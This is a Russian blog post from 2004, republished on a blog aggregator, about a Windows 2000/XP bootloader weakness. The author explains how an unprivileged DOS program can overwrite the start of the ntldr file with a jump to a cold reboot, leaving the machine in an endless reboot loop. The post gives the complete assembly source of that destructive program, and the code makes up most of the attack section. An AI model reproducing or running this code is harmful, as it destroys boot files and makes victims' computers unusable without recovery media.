Сегодня 13 мая, вторник

Какой рейтинг вас больше интересует?

получить код

Главная / Каталог блогов / Cтраница блогера juliy / Запись в блоге

	juliy Голосов: 7 Адрес блога: http://juliy.livejournal.com/ Добавлен: 2007-10-21 04:02:40 блограйдером Lurk

seek and destroy

2004-10-09 17:42:54 (читать в оригинале)

чуть меньше чем два года назад эту дырку обнаружил случайно, старый исходник (он был под win32) проебался куда-то, так что решил проверить и по-быстрому накропал новый в формате .com для эмулятора доса. только что проверил, за два года ничего не изменилось, и этот маленький .com-файл на 69 байт по прежнему срубает загрузчик win2000 и winXP, несмотря на продвинутую защиту системы неебаться. дырка в том, что винда старательно следит за своими системными файлами и подменяет их резервными копиями, если те оказались запорчены; но в то же время почему-то кладет большой такой толстый член на загрузочные файлы в корне системного диска. в итоге сия программулина, будучи запущена от любого юзера в эмуляторе доса (то бишь она по сути совсем бесправна); снимает атрибуты "только для чтения", "системный " и "скрытый" с файла ntldr, который получает управление при загрузке системы первым, вписывает в его начало пять байт перехода на холодную перезагрузку системы и восстанавливает атрибуты обратно. в итоге после перезагрузки комп будет перезагружаться постоянно циклически, пока его кто-то не загрузит с дискеты или cd. и нажать F8 для выбора вариантов загрузки тоже возможности не будет, потаму как до этого места процесс загрузки и близко не доходит. WIN

внимание! скомпилировав и запустив этот файл, вы имеете все шансы угробить загрузчик win2000 / winXP (ntldr), если не сделаете предварительно ево копию

.286
.model tiny
.code
org 100h
start:
       mov ax, 4300h
       mov dx, offset fname
       int 21h
       mov fattr, cx
       mov ax, 4301h
       mov cx, 20h
       int 21h
       mov ax, 3d02h
       int 21h
       jc quit
       xchg ax, bx
       mov ah, 40h
       mov dx, offset reboot
       int 21h
       mov ah, 3eh
       int 21h
quit:
       mov ax, 4301h
       mov dx, offset fname
       mov cx, fattr
       int 21h
       int 20h
reboot db 0eah, 00h, 00h, 0ffh, 0ffh
fattr dw ?
fname db 'c:\ntldr',0
end start

Блограйдеров
14510

Блогов
219955
(+0 сегодня)

Сообществ
1311
(+0 сегодня)

Рыбалка
по среднему баллу (5.00) в категории «Спорт»

Категория «Картинки»

Взлеты Топ 5


+2036	2053	Ищешь oldMike? - Это ЗдесЪ!
+1994	2064	Splash_Phantom
+1961	2094	ДеВаЧкА-НеФоРмАлКа
+1948	2106	ROMAHA.SU
+1947	2080	Yurenzo

Падения Топ 5


-1	1366	Выдающиеся женщины
-8	18	anmak
-8	543	absit_omen
-9	17	ВАДОС
-10	1539	Главная

Загрузка...

BlogRider.ru не имеет отношения к публикуемым в записях блогов материалам. Все записи
взяты из открытых общедоступных источников и являются собственностью их авторов.